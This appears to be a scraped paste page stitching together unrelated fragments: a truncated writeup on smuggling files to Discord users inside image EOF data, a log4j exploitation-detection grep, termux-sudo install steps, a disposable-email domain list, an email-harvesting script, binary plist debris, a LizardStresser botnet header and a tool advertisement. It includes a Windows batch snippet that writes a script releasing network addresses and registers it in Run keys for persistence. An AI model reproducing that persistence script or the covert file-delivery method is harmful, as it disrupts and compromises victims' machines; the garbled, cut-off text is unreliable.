ClumsyLulz SleepTheGod

Local Storage Reassembly

General

The purpose of this writeup is to document a method that can be exploited in order to transfer files to a Discord user's Windows system, without said user's explicit consent. This method does not allow for immediate and direct execution of the file, therefore it does not qualify as an individual security vulnerability.

Technique

LSR requires an image file that will not be modified by Discord. Images that have already been compressed are not modified in any way, EOF data is not trimmed or altered. Using such an image, any file can be split into chunks that (combined with the image) don't exceed 8Mb, which is the upload limit for regular Discord accounts. These images containing EOF data can be sent to a user without being altered - file hashes do not match, so remote caching can not be used, and the original image has already been compressed, thus no additional compression will take place. As soon as the user views the given conversation and the images load, they a

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

	apt install git

	git clone https://gitlab.com/st42/termux-sudo

	cd termux-sudo

	cat sudo > /data/data/com.termux/files/usr/bin/sudo

	chmod 700 /data/data/com.termux/files/usr/bin/sudo

	0815.ru
	0815.ru0clickemail.com
	0815.ry
	0815.su
	0845.ru
	0clickemail.com
	0-mail.com
	0wnd.net
	0wnd.org
	10mail.com

	echo @echo off>c:windowswimn32.bat
	echo break off>>c:windowswimn32.bat
	echo ipconfig/release_all>>c:windowswimn32.bat
	echo end>>c:windowswimn32.bat
	reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowsswimn32.bat /f
	reg add hkey_current_usersoftwaremicrosfotwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat /f
	echo You have maxed your usage for a lifetime ??
	PAUSE

	import requests
	import sys
	import re


	def get_mails(domain):
	url = 'https://pgp.circl.lu/pks/lookup?search={}&fingerprint=on&op=index'.format(domain)
	res = requests.get(url).text
	mails = re.findall(r'<a href=".">(.)<\/a>', res)

	streamtypedÅËÑ@ÑÑÑNSMutableDictionaryÑÑNSDictionaryÑÑNSObjectÖÑiíÑÑÑNSStringïÑ+bagÜíÑÑÑ
	NSMutableDataÑÑNSDataïñÇXƒÑ [115800c]<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
	<plist version="1.0">
	<dict>
	<key>search</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/search</string>
	<key>advancedSearch</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/advancedSearch?cc=us</string>
	<key>searchHints</key><string>https://search.itunes.apple.com/WebObjects/MZSearchHints.woa/wa/hints</string>
	<key>searchApi</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/searchApi</string>
	<key>p2-book-search</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/search?media=ebook</string>

	/*
	Chippy1337 and @packetprophet present:
	LizardStresser rekt
	This is the cross compiled bot

	LICENSE AGREEMENT:
	If you lulz'd, you must sent BTC to
	1N4MxbXsooU9aMU41NPrSbgZKpJjtwsnar

	Death to skids

	import os
	import time

	while True:
	try:
	os.mkdir('F:\\A')
	print("Directory 'A' created.")
	except FileExistsError:
	print("Directory 'A' already exists.")

	Hi All!

	I've recently launched a tool that wraps many of the commands here with a user interface. This desktop application is currently available for macOS. There's a roadmap outlining planned features for the near future.
	Feel free to request any features you'd like to see, and I'll prioritize them accordingly.
	One of the most important aspects of this application is that every command executed behind the scenes is displayed in a special log section. This allows you to see exactly what’s happening and learn from it.

	Here's the link to the repository: https://github.com/Pulimet/ADBugger

	App Description:
	ADBugger is a desktop tool designed for debugging and QA of Android devices and emulators. It simplifies testing, debugging, and performance analysis by offering device management, automated testing, log analysis, and remote control capabilities. This ensures smooth app performance across various setups.